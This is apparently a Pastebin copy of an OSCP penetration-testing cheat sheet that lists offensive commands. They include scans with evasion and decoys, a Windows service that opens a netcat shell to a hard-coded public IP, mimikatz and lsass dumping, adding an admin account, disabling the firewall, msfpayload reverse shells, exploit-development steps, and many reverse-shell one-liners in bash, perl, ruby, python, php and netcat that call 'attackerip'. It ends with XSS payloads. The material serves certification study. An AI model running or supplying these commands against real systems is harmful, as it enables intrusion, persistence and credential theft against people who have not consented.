elonmusk498

Untitled

Oct 5th, 2016
414
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Site Reference:
  2.  
  3. https://sathisharthars.wordpress.com/2015/01/28/oscp-offensive-security-certified-professional-handy-tips-and-tricks/
  4.  
  5. OSCP Handy Commands by sathisharthars
  6.  
  7. Nmap Full Web Vulnerable Scan:
  8.  
  9.  
  10.  
  11. mkdir /usr/share/nmap/scripts/vulscan
  12.  
  13. cd /usr/share/nmap/scrripts/vulscan
  14.  
  15. wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
  16.  
  17. nmap -sS -sV –script=vulscan/vulscan.nse target
  18.  
  19. nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
  20.  
  21. nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
  22.  
  23. nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target
  24.  
  25. nmap -sV –script=vuln target
  26.  
  27. nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target
  28.  
  29.  
  30. Dirb Directory Bruteforce:
  31.  
  32. dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40. Nikto Scanner:
  41.  
  42. nikto -C all -h http://IP
  43.  
  44.  
  45.  
  46. WordPress Scanner:
  47.  
  48. wpscan –url http://IP/ –enumerate p
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56. Uniscan Scanning:
  57.  
  58. uniscan.pl -u target -qweds
  59. HTTP Enumeration:
  60.  
  61. httprint -h http://www.example.com -s signatures.txt
  62. SKIP Fish Scanner:
  63.  
  64. skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72. Uniscan Scanning:
  73.  
  74. uniscan –u http://www.hubbardbrook.org –qweds
  75.  
  76. Here, -q – Enable Directory checks
  77. -w – Enable File Checks
  78. -e – Enable robots.txt and sitemap.xml check
  79. -d – Enable Dynamic checks
  80. -s – Enable Static checks
  81.  
  82.  
  83.  
  84.  
  85.  
  86. Skipfish Scanning:
  87.  
  88. m-time threads -LVY donot update after result
  89.  
  90. skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
  91.  
  92.  
  93.  
  94.  
  95.  
  96. Nmap Ports Scan:
  97.  
  98.  
  99.  
  100. 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
  101.  
  102.  
  103.  
  104. 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
  105.  
  106. 2)fargement
  107.  
  108. 3)data packed – like orginal one not scan packet
  109.  
  110. 4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
  111.  
  112. 5) nmap –source-port 53 target
  113.  
  114.  
  115.  
  116.  
  117.  
  118. nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
  119.  
  120. nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
  121.  
  122. nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
  123.  
  124. nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
  125.  
  126. nmap -sA -PN -sN target
  127.  
  128. nmap -sS -sV -T5 -F -A -O target (version detection)
  129.  
  130. nmap -sU -v target (Udp)
  131.  
  132. nmap -sU -P0 (Udp)
  133.  
  134. nmap -sC 192.168.31.10-12 (all scan default)
  135. Netcat Scanning:
  136.  
  137. nc -v -w 1 target -z 1-1000
  138.  
  139. for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done
  140.  
  141.  
  142.  
  143. US Scanning:
  144.  
  145. us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535
  146.  
  147.  
  148.  
  149. Unicornscan Scanning:
  150.  
  151. unicornscan X.X.X.X:a -r10000 -v
  152.  
  153.  
  154.  
  155. Kernel Scanning:
  156.  
  157. xprobe2 -v -p tcp:80:open 192.168.6.66
  158.  
  159.  
  160.  
  161. Samba Enumeartion:
  162.  
  163. nmblookup -A target
  164.  
  165. smbclient //MOUNT/share -I target -N
  166.  
  167. rpcclient -U “” target
  168.  
  169. enum4linux target
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179. SNMP ENumeration:
  180.  
  181. snmpget -v 1 -c public IP version
  182.  
  183. snmpwalk -v 1 -c public IP
  184.  
  185. snmpbulkwalk -v 2 -c public IP
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194.  
  195.  
  196.  
  197. Windows Useful commands:
  198.  
  199.  
  200.  
  201. net localgroup Users
  202.  
  203. net localgroup Administrators
  204.  
  205. search dir/s *.doc
  206.  
  207. system(“start cmd.exe /k $cmd”)
  208.  
  209. sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
  210.  
  211. /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
  212.  
  213. mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
  214.  
  215. Procdump.exe -accepteula -ma lsass.exe lsass.dmp
  216.  
  217. mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
  218.  
  219. C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
  220.  
  221. C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
  222.  
  223.  
  224.  
  225.  
  226.  
  227. Plink Tunnel:
  228.  
  229. plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X
  230.  
  231.  
  232. Enable RDP Access:
  233.  
  234. reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
  235.  
  236. netsh firewall set service remoteadmin enable
  237.  
  238. netsh firewall set service remotedesktop enable
  239.  
  240.  
  241.  
  242. Turn Off Firewall:
  243.  
  244. netsh firewall set opmode disable
  245.  
  246.  
  247.  
  248.  
  249.  
  250. Meterpreter:
  251.  
  252.  
  253.  
  254. run getgui -u admin -p 1234
  255.  
  256. run vnc -p 5043
  257.  
  258.  
  259.  
  260.  
  261.  
  262. Add User Windows:
  263.  
  264. net user test 1234 /add
  265.  
  266. net localgroup administrators test /add
  267.  
  268.  
  269.  
  270.  
  271.  
  272. Mimikatz:
  273.  
  274. privilege::debug
  275.  
  276. sekurlsa::logonPasswords full
  277.  
  278.  
  279.  
  280.  
  281.  
  282. Passing the Hash:
  283.  
  284. pth-winexe -U hash //IP cmd
  285.  
  286.  
  287.  
  288.  
  289.  
  290. Password Cracking using Hashcat:
  291.  
  292. hashcat -m 400 -a 0 hash /root/rockyou.txt
  293.  
  294.  
  295.  
  296.  
  297.  
  298.  
  299.  
  300.  
  301.  
  302. Netcat commands:
  303.  
  304. c:> nc -l -p 31337
  305. #nc 192.168.0.10 31337
  306. c:> nc -v -w 30 -p 31337 -l < secret.txt
  307. #nc -v -w 2 192.168.0.10 31337 > secret.txt
  308.  
  309.  
  310.  
  311.  
  312.  
  313. Banner Grabbing:
  314.  
  315. nc 192.168.0.10 80
  316. GET / HTTP/1.1
  317. Host: 192.168.0.10
  318. User-Agent: SPOOFED-BROWSER
  319. Referrer: K0NSP1RACY.COM
  320. <enter>
  321. <enter>
  322.  
  323.  
  324.  
  325.  
  326.  
  327.  
  328.  
  329. window reverse shell:
  330.  
  331.  
  332.  
  333. c:>nc -Lp 31337 -vv -e cmd.exe
  334. nc 192.168.0.10 31337
  335. c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
  336. nc -lp 80
  337.  
  338.  
  339.  
  340. #nc -lp 31337 -e /bin/bash
  341. nc 192.168.0.11 31337
  342. nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
  343.  
  344.  
  345.  
  346.  
  347.  
  348.  
  349.  
  350.  
  351.  
  352. Find all SUID root files:
  353.  
  354. find / -user root -perm -4000 -print
  355.  
  356.  
  357.  
  358. Find all SGID root files:
  359.  
  360. find / -group root -perm -2000 -print
  361.  
  362.  
  363.  
  364. Find all SUID and SGID files owned by anyone:
  365.  
  366. find / -perm -4000 -o -perm -2000 -print
  367.  
  368.  
  369.  
  370. Find all files that are not owned by any user:
  371.  
  372. find / -nouser -print
  373.  
  374.  
  375.  
  376. Find all files that are not owned by any group:
  377.  
  378. find / -nogroup -print
  379.  
  380.  
  381.  
  382. Find all symlinks and what they point to:
  383.  
  384. find / -type l -ls
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394. Python:
  395.  
  396. python -c ‘import pty;pty.spawn(“/bin/bash”)’
  397.  
  398. python -m SimpleHTTPServer (Starting HTTP Server)
  399.  
  400.  
  401.  
  402.  
  403.  
  404. PID:
  405.  
  406. fuser -nv tcp 80 (list PID of process)
  407.  
  408. fuser -k -n tcp 80 (Kill Process of PID)
  409.  
  410.  
  411.  
  412.  
  413.  
  414. Hydra:
  415.  
  416. hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)
  417.  
  418.  
  419.  
  420. Mount Remote Windows Share:
  421.  
  422. smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
  423.  
  424.  
  425.  
  426.  
  427.  
  428. Compiling Exploit in Kali:
  429.  
  430. gcc -m32 -o output32 hello.c (32 bit)
  431.  
  432. gcc -o output hello.c (64 bit)
  433.  
  434.  
  435.  
  436.  
  437.  
  438.  
  439.  
  440. Compiling Windows Exploits on Kali:
  441.  
  442. cd /root/.wine/drive_c/MinGW/bin
  443.  
  444. wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  445.  
  446. wine ability.exe
  447.  
  448.  
  449.  
  450.  
  451.  
  452. NASM Command:
  453.  
  454. nasm -f bin -o payload.bin payload.asm
  455.  
  456. nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
  457.  
  458.  
  459.  
  460.  
  461.  
  462.  
  463.  
  464. SSH Pivoting:
  465.  
  466.  
  467.  
  468. ssh -D 127.0.0.1:1080 -p 22 user@IP
  469.  
  470. Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
  471.  
  472. proxychains commands target
  473.  
  474.  
  475.  
  476.  
  477.  
  478. Pivoting to One Network to Another:
  479.  
  480.  
  481.  
  482. ssh -D 127.0.0.1:1080 -p 22 user1@IP1
  483.  
  484. Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
  485.  
  486. proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
  487.  
  488. Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
  489.  
  490. proxychains commands target
  491.  
  492.  
  493.  
  494.  
  495.  
  496. Pivoting Using metasploit:
  497.  
  498.  
  499.  
  500. route add 10.1.1.0 255.255.255.0 1
  501.  
  502. route add 10.2.2.0 255.255.255.0 1
  503.  
  504. use auxiliary/server/socks4a
  505.  
  506. run
  507.  
  508. proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
  509.  
  510.  
  511.  
  512.  
  513.  
  514. Exploit-DB search using CSV File:
  515.  
  516.  
  517.  
  518. searchsploit-rb –update
  519.  
  520. searchsploit-rb -t webapps -s WEBAPP
  521.  
  522. searchsploit-rb –search=”Linux Kernel”
  523.  
  524. searchsploit-rb -a “author name” -s “exploit name”
  525.  
  526. searchsploit-rb -t remote -s “exploit name”
  527.  
  528. searchsploit-rb -p linux -t local -s “exploit name”
  529.  
  530.  
  531.  
  532.  
  533.  
  534. For Privilege Escalation Exploit search:
  535.  
  536. cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3
  537.  
  538.  
  539.  
  540.  
  541.  
  542.  
  543.  
  544.  
  545.  
  546. Metasploit Payloads:
  547.  
  548.  
  549.  
  550. msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
  551.  
  552. msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
  553.  
  554. msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
  555.  
  556. msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
  557.  
  558.  
  559.  
  560. Create a Linux Reverse Meterpreter Binary
  561.  
  562. msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
  563.  
  564.  
  565.  
  566. Create Reverse Shell (Shellcode)
  567.  
  568. msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b “\x00\x0a\x0d”
  569.  
  570.  
  571.  
  572. Create a Reverse Shell Python Script
  573.  
  574. msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
  575.  
  576.  
  577.  
  578. Create a Reverse ASP Shell
  579.  
  580. msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp
  581.  
  582.  
  583.  
  584. Create a Reverse Bash Shell
  585.  
  586. msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh
  587.  
  588.  
  589.  
  590. Create a Reverse PHP Shell
  591.  
  592. msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php
  593.  
  594. Edit shell.php in a text editor to add <?php at the beginning.
  595.  
  596.  
  597.  
  598. Create a Windows Reverse Meterpreter Binary
  599.  
  600. msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe
  601.  
  602.  
  603.  
  604.  
  605.  
  606.  
  607.  
  608.  
  609.  
  610. Security Commands In Linux:
  611.  
  612.  
  613.  
  614. find programs with a set uid bit
  615.  
  616. # find / -uid 0 -perm -4000
  617.  
  618.  
  619.  
  620. find things that are world writable
  621.  
  622. # find / -perm -o=w
  623.  
  624.  
  625.  
  626. find names with dots and spaces, there shouldn’t be any
  627. # find / -name ” ” -print
  628. # find / -name “..” -print
  629. # find / -name “. ” -print
  630. # find / -name ” ” -print
  631.  
  632.  
  633.  
  634. find files that are not owned by anyone
  635. # find / -nouser
  636.  
  637.  
  638.  
  639. look for files that are unlinked
  640.  
  641. # lsof +L1
  642.  
  643.  
  644.  
  645. get information about procceses with open ports
  646. # lsof -i
  647.  
  648.  
  649.  
  650. look for weird things in arp
  651. # arp -a
  652.  
  653.  
  654.  
  655. look at all accounts including AD
  656. # getent passwd
  657.  
  658.  
  659.  
  660. look at all groups and membership including AD
  661.  
  662. # getent group
  663.  
  664.  
  665.  
  666. list crontabs for all users including AD
  667. # for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done
  668.  
  669.  
  670.  
  671. #generate random passwords
  672. cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
  673.  
  674.  
  675.  
  676. # find all immutable files, there should not be any
  677. find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
  678.  
  679.  
  680.  
  681. # fix immutable files
  682. chattr -i file
  683.  
  684.  
  685.  
  686.  
  687.  
  688. Windows Buffer Overflow Exploitation Commands:
  689.  
  690.  
  691.  
  692. msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c
  693.  
  694.  
  695.  
  696. msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
  697. COMMONLY USED BAD CHARACTERS:
  698.  
  699. \x00\x0a\x0d\x20 For http request
  700. \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
  701. Useful Commands:
  702.  
  703.  
  704.  
  705. pattern create
  706. pattern offset (EIP Address)
  707. pattern offset (ESP Address)
  708. add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
  709.  
  710.  
  711.  
  712. !pvefindaddr pattern_create 5000
  713. !pvefindaddr suggest
  714. !pvefindaddr modules
  715. !pvefindaddr nosafeseh
  716.  
  717.  
  718.  
  719.  
  720.  
  721. !mona config -set workingfolder C:\Mona\%p
  722. !mona config -get workingfolder
  723. !mona mod
  724. !mona bytearray -b “\x00\x0a”
  725. !mona pc 5000
  726. !mona po EIP
  727. !mona suggest
  728.  
  729.  
  730.  
  731.  
  732.  
  733.  
  734.  
  735. SEH:
  736.  
  737. !mona suggest
  738. !mona nosafeseh
  739. nseh=”\xeb\x06\x90\x90″ (next seh chain)
  740. iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
  741.  
  742.  
  743.  
  744.  
  745.  
  746.  
  747.  
  748. ROP (DEP):
  749.  
  750. !mona modules
  751. !mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
  752. !mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)
  753.  
  754.  
  755.  
  756.  
  757.  
  758. ASLR:
  759.  
  760. !mona noaslr
  761.  
  762.  
  763.  
  764. EGG Hunter:
  765.  
  766. !mona jmp -r esp
  767. !mona egg -t lxxl
  768. \xeb\xc4 (jump backward -60)
  769. buff=lxxllxxl+shell
  770. !mona egg -t ‘w00t’
  771.  
  772.  
  773.  
  774. GDB Debugger Commands:
  775. Setting Breakpoint :
  776.  
  777. break *_start
  778.  
  779.  
  780.  
  781. Execute Next Instruction :
  782.  
  783. next
  784. step
  785. n
  786. s
  787.  
  788.  
  789.  
  790. Continue Execution :
  791.  
  792. continue
  793. c
  794.  
  795.  
  796.  
  797. Data :
  798.  
  799. checking ‘REGISTERS’ and ‘MEMORY’
  800. Display Register Values : (Decimal , Binary , Hex )
  801.  
  802. print /d –> Decimal
  803. print /t –> Binary
  804. print /x –> Hex
  805. O/P :
  806.  
  807. (gdb) print /d $eax
  808.  
  809. $17 = 13
  810.  
  811. (gdb) print /t $eax
  812. $18 = 1101
  813.  
  814. (gdb) print /x $eax
  815. $19 = 0xd
  816. (gdb)
  817.  
  818.  
  819.  
  820.  
  821.  
  822. Display values of specific memory locations :
  823. command : x/nyz (Examine)
  824.  
  825. n –> Number of fields to display ==>
  826. y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
  827. z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
  828. Cheat Codes:
  829.  
  830.  
  831.  
  832. Reverse Shellcode:
  833.  
  834.  
  835.  
  836.  
  837.  
  838. BASH:
  839.  
  840. bash -i >& /dev/tcp/192.168.23.10/443 0>&1
  841.  
  842.  
  843.  
  844. exec /bin/bash 0&0 2>&0
  845. exec /bin/bash 0&0 2>&0
  846.  
  847.  
  848.  
  849. 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
  850.  
  851.  
  852.  
  853. 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
  854.  
  855.  
  856.  
  857. exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  858. exec 5<>/dev/tcp/attackerip/4444
  859.  
  860.  
  861.  
  862. cat <&5 | while read line; do $line 2>&5 >&5; done # or:
  863. while read line 0<&5; do $line 2>&5 >&5; done
  864.  
  865.  
  866.  
  867. /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
  868. /bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
  869.  
  870.  
  871.  
  872.  
  873.  
  874.  
  875.  
  876.  
  877.  
  878. PERL:
  879.  
  880. Shorter Perl reverse shell that does not depend on /bin/sh:
  881.  
  882.  
  883.  
  884. perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  885.  
  886.  
  887.  
  888. perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  889.  
  890.  
  891.  
  892. If the target system is running Windows use the following one-liner:
  893.  
  894.  
  895.  
  896. perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  897.  
  898.  
  899.  
  900. perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  901.  
  902.  
  903.  
  904. perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
  905.  
  906.  
  907.  
  908. perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
  909.  
  910.  
  911.  
  912.  
  913.  
  914.  
  915.  
  916. RUBY:
  917.  
  918. Longer Ruby reverse shell that does not depend on /bin/sh:
  919.  
  920. ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  921.  
  922.  
  923.  
  924. ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  925.  
  926.  
  927.  
  928. If the target system is running Windows use the following one-liner:
  929. ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  930.  
  931.  
  932.  
  933. ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  934.  
  935.  
  936.  
  937. ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
  938.  
  939.  
  940.  
  941. ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
  942.  
  943.  
  944.  
  945.  
  946.  
  947.  
  948.  
  949. PYTHON:
  950.  
  951.  
  952.  
  953. python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
  954.  
  955.  
  956.  
  957. python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
  958.  
  959.  
  960.  
  961.  
  962.  
  963.  
  964.  
  965. PHP:
  966.  
  967. This code assumes that the TCP connection uses file descriptor 3.
  968.  
  969.  
  970.  
  971. php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
  972.  
  973. php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
  974. If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK
  975.  
  976.  
  977.  
  978.  
  979.  
  980. NETCAT:
  981.  
  982. Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
  983.  
  984. nc -e /bin/sh attackerip 4444
  985.  
  986. nc -e /bin/sh 192.168.37.10 443
  987.  
  988.  
  989.  
  990. If the -e option is disabled, try this
  991.  
  992.  
  993.  
  994. mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe
  995.  
  996. mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
  997.  
  998. /bin/sh | nc attackerip 4444
  999.  
  1000. /bin/sh | nc 192.168.23.10 443
  1001.  
  1002. rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/
  1003.  
  1004. rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/
  1005.  
  1006.  
  1007.  
  1008. If you have the wrong version of netcat installed, try
  1009.  
  1010.  
  1011.  
  1012. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f
  1013.  
  1014. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  1015.  
  1016.  
  1017.  
  1018.  
  1019.  
  1020.  
  1021.  
  1022. TELNET:
  1023.  
  1024. If netcat is not available or /dev/tcp
  1025.  
  1026.  
  1027.  
  1028. mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
  1029.  
  1030. mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
  1031.  
  1032.  
  1033.  
  1034.  
  1035.  
  1036.  
  1037.  
  1038. XTERM:
  1039.  
  1040. Xterm is the best..
  1041.  
  1042.  
  1043.  
  1044. To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu.
  1045.  
  1046.  
  1047.  
  1048. Xnest :1 # Note: The command starts with uppercase X
  1049.  
  1050. Xnest :1 # Note: The command starts with uppercase X
  1051.  
  1052.  
  1053.  
  1054. Then remember to authorise on your system the target IP to connect to you:
  1055.  
  1056. xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
  1057.  
  1058.  
  1059.  
  1060. xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
  1061.  
  1062. xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
  1063.  
  1064.  
  1065.  
  1066. If you want anyone to connect to this spawned xterm try:
  1067.  
  1068. xhost + # Run this INSIDE the spawned xterm on the open X Server
  1069.  
  1070. xhost + # Run this INSIDE the spawned xterm on the open X Server
  1071.  
  1072.  
  1073.  
  1074. Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
  1075.  
  1076. xterm -display attackerip:1
  1077.  
  1078. xterm -display attackerip:1
  1079.  
  1080.  
  1081.  
  1082. Or:
  1083.  
  1084. $ DISPLAY=attackerip:0 xterm
  1085.  
  1086. $ DISPLAY=attackerip:0 xterm
  1087.  
  1088.  
  1089.  
  1090. It will try to connect back to you, attackerip, on TCP port 6001.
  1091.  
  1092. Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
  1093.  
  1094.  
  1095.  
  1096. /usr/openwin/bin/xterm -display attackerip:1
  1097.  
  1098. /usr/openwin/bin/xterm -display attackerip:1
  1099.  
  1100.  
  1101.  
  1102.  
  1103.  
  1104. PHP:
  1105.  
  1106. php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’
  1107.  
  1108.  
  1109.  
  1110.  
  1111.  
  1112. JAVA:
  1113. r = Runtime.getRuntime()
  1114. p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
  1115. p.waitFor()
  1116.  
  1117.  
  1118.  
  1119.  
  1120.  
  1121.  
  1122.  
  1123.  
  1124.  
  1125. XSS Cheat Codes:
  1126.  
  1127.  
  1128.  
  1129. (“< iframes > src=http://IP:PORT </ iframes >”)
  1130.  
  1131.  
  1132.  
  1133. <script>document.location=http://IP:PORT</script>
  1134.  
  1135.  
  1136.  
  1137. ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1138.  
  1139.  
  1140.  
  1141. ”;!–“<XSS>=&amp;amp;{()}
  1142.  
  1143.  
  1144.  
  1145. <IMG SRC=”javascript:alert(‘XSS’);”>
  1146. <IMG SRC=javascript:alert(‘XSS’)>
  1147. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
  1148. <IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>
  1149.  
  1150.  
  1151.  
